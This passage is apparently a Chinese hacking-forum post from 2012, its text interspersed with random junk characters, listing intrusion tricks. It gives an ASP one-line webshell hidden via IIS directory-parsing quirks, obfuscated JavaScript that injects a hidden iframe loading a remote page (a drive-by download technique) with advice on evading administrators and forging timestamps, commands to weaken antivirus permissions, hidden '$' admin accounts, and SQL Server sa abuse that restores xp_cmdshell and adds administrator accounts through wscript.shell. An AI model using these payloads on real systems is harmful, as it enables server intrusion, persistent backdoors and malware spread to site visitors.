. \4 n0 J5 n8 Z9 Y3 |2 t1 P通过web访问ASP木马:http://ip/images../news.asp?action=login! V [8 b3 e4 w. C
如何删除非标准目录:rmdir images..\ /s4 e+ X% }" s. @$ ]2 p
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
+ Z% x/ o* S; u5 \mkdir programme.asp% ^. { y1 O( y# t# H
新建1.txt文件内容:<!--#include file=”12.jpg”-->
2 U. l8 Y% k7 _* g新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件4 O' ^9 o5 P& ~8 K& P4 c% e! r/ z3 E
attrib +H +S programme.asp
Y. {$ r3 S9 F7 s* v" |# z2 c. g% @通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
( o# \5 J& S% y: l" x
# i4 w6 G" q: R+ y54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
" r3 v/ F2 A) }9 K5 c0 h然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。0 }5 Q( v0 @& q" w/ A: D. U
+ _) Q$ {9 |# E! A# t
55、JS隐蔽挂马
- Q$ s. S% N" u: Q3 O m1.9 P6 E$ k3 U, x: E% t- G
var tr4c3="<iframe src=ht";) v, n1 z( W5 f7 D7 L
tr4c3 = tr4c3+"tp:/";
- f% K4 Q# W* L% r8 otr4c3 = tr4c3+"/ww";2 o) ]6 X5 C+ A# {
tr4c3 = tr4c3+"w.tr4";
1 N2 Z# U7 N8 L) ^& wtr4c3 = tr4c3+"c3.com/inc/m";
# J( H& L2 g, H* S) }tr4c3 = tr4c3+"m.htm style="display:none"></i";
( Q9 t; L5 t9 W0 ?tr4c3 =tr4c3+"frame>'";$ J4 j/ @% w5 ^+ I$ V
document.write(tr4c3);
: A& {9 D$ B9 r3 t1 T* @# V避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。: h1 S; X0 n5 L/ _$ K0 b- w0 `
- A" o( C# Y% o- e5 V0 y2./ t. S/ j+ C w4 j
转换进制,然后用EVAL执行。如
$ C2 o8 `9 f9 O! g: l2 seval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
$ F V; Z1 J* S0 K不过这个有点显眼。4 z& `4 D- x* @( d" ]
3.
2 c5 Y+ ?8 ^! H: [5 G) x6 Sdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');: B. B9 w5 ?, L0 x
最后一点,别忘了把文件的时间也修改下。: W# C. H s- ~7 C
% v d: e2 w2 b$ `56.3389终端入侵常用DOS命令
8 Z/ T7 }0 @% N Itaskkill taskkill /PID 1248 /t: R( y' r9 s6 g1 B
5 F( o6 E' @- M4 M K
tasklist 查进程
' X2 b* C% N- [* E3 t( u
% D$ p9 v% N! D" j; m( L4 a! j w5 }cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
% ~: T9 s& X$ s( eiisreset /reboot
. B6 }7 ?# h0 s6 e. I" f. Utsshutdn /reboot /delay:1 重起服务器
5 P/ d# B0 Q" D) q3 u
5 k5 U- Z% S2 E% {, Glogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
7 ]/ O4 J1 z7 V" v
3 r5 ~) T6 _* O, i9 P% \query user 查看当前终端用户在线情况
x4 g+ p. h: O# q( m
3 c& H) O8 b- A+ M要显示有关所有会话使用的进程的信息,请键入:query process *
2 N A' n) M6 I, `: U; X- o" x$ Z( H7 S, L B
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
' ^1 u# B1 M; ?% o! c
; E; \6 @+ b5 T8 V: X; }要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
9 R* `# H# e; W/ I0 A0 h* p" ~% \/ j! r, X% P
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
+ e% v0 `( V* d A3 F( q; F* n3 r8 a+ s9 j+ b) d
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启+ ^7 j4 Q) s8 j. q
5 m" l8 R! }5 Z+ d
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
5 W$ {' ~ n8 z( B) ?' l3 N4 M* e
+ e/ @. d6 o0 `- T命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。8 f6 A% F1 e: h& D' h& `/ o
1 j- }: d7 T( { ^2 i3 @/ t J& E命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
+ i. d u5 A; J @# x: a, p' _; g! \! S2 V/ F7 o& I
56、在地址栏或按Ctrl+O,输入:5 a' i) ?* H. U( C( w
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;/ Y M4 B; B3 F& H* p4 L
$ P# K. e8 G1 ? G7 {: U: {8 e
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。7 A3 q R5 b7 Q2 e9 s% [9 d0 t9 x
3 O$ Q; B2 l# f" J- T3 e4 t. J
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,4 j2 I$ k+ |( v! V5 i/ M: J
用net localgroup administrators是可以看到管理组下,加了$的用户的。
5 U. c% x6 Q" Z {, i8 c3 Y, l3 D
58、 sa弱口令相关命令
) G7 n, B+ g8 |, w# v+ a0 f7 m/ W+ e' Q% j; c, r
一.更改sa口令方法:
$ E6 Z4 f) A0 v' i: w( D0 C& R, c2 N用sql综合利用工具连接后,执行命令:
1 m# ^! l; I! U, Lexec sp_password NULL,'20001001','sa'5 `: u8 o/ \3 h- E/ t6 D
(提示:慎用!)6 ], c5 U3 ]( f! x- C
; N' R, Z! ^5 Y/ c" H二.简单修补sa弱口令.
9 K5 ?2 R& V2 a4 L
, V: q! k/ Q U4 o% ^) Q$ n方法1:查询分离器连接后执行:
- S, w) {# B* e, [4 [7 ]! F+ uif exists (select * from3 F: W& N- F& r. P7 k" R+ f
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
! b2 m! o/ R( T# QOBJECTPROPERTY(id, N'IsExtendedProc') = 1)
0 m3 c% C0 ]1 x) n0 u- Y1 c% D9 b! p) I6 G
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'& R; e- p# d; a7 |7 X
. C# A2 p( V$ h
GO
' Z! O, @, v0 u y: B3 X% t" C7 F/ t) ?+ c4 J- N- h
然后按F5键命令执行完毕
7 B0 B" N- D5 M3 n7 N* u6 [% `7 c- F( \' N0 E
方法2:查询分离器连接后6 k- l0 n0 u7 q1 `+ P
第一步执行:use master2 o, ]3 r- T% d: Q5 z
第二步执行:sp_dropextendedproc 'xp_cmdshell'1 y# p; @ | P# G1 q: Z% h, v& H
然后按F5键命令执行完毕$ V* J& K6 T7 `
& S- A+ Y1 V7 A: Z- X
+ @! x- \& v* Z3 G( v& s( b2 ~三.常见情况恢复执行xp_cmdshell.
5 f3 o5 ]/ O+ O9 m, B
' I: s2 \6 C+ N4 `6 L6 T! k9 A. q1 j4 Z$ D! u7 m
1 未能找到存储过程'master..xpcmdshell'.
* H1 \. H9 C# t* W- u* p) n 恢复方法:查询分离器连接后,
& A ]" g' }4 |. X2 |1 A第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
/ o: d4 i8 N9 i9 a# Z6 d+ P3 X$ q第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
" l2 g6 G0 w$ V6 E8 t5 [然后按F5键命令执行完毕
. v) F" q& |! C# L1 A6 M
( E8 |. O6 T; s1 z+ ? k2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)2 v: k! W& m/ H I; |8 b! Q& U
恢复方法:查询分离器连接后, e8 h F: Y6 \; ~7 j
第一步执行:sp_dropextendedproc "xp_cmdshell" Y% G0 b0 y% D5 y
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
9 }8 `$ k' Y6 M; }然后按F5键命令执行完毕
0 A$ k& H1 Q2 X" P' e# A! ~+ W$ U k1 X" J7 Z# V1 m0 r
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)7 l3 g% E- ~4 l9 e9 Y
恢复方法:查询分离器连接后,
! D# O0 N$ I8 J: k4 N% ^第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
9 f7 ~4 p+ `0 @' j' O; T$ H第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
& A1 p4 p" y' {& }然后按F5键命令执行完毕+ [% t# `) K6 M n
3 s% U1 q& c- Q7 R% o四.终极方法.0 l# A/ Z& o" `# g$ S
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
& T5 k* Q4 v: _" `2 X y2 S查询分离器连接后,
; U) l( [3 q9 S. a( ?2000servser系统:9 s/ L% E; g2 `) @! W
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
: J1 h4 u. s* R9 z2 G
) b9 I$ G& N# D2 q% p5 @declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'0 k8 h9 e" v' E7 P B) O D( h
. ?" T; l, ]5 p* w: i- sxp或2003server系统:. B+ @7 l* l# V9 W/ C/ F
4 T+ K5 C8 B; w) a g# K+ ~9 Ydeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add', m6 X. T* h, m/ q3 b9 q: \
6 B Z. h: E p) Y* M( ~, ldeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
7 O! g% r# i4 d% K, g k# O |
发表于 2012-9-15 14:13:15
收藏
支持
反对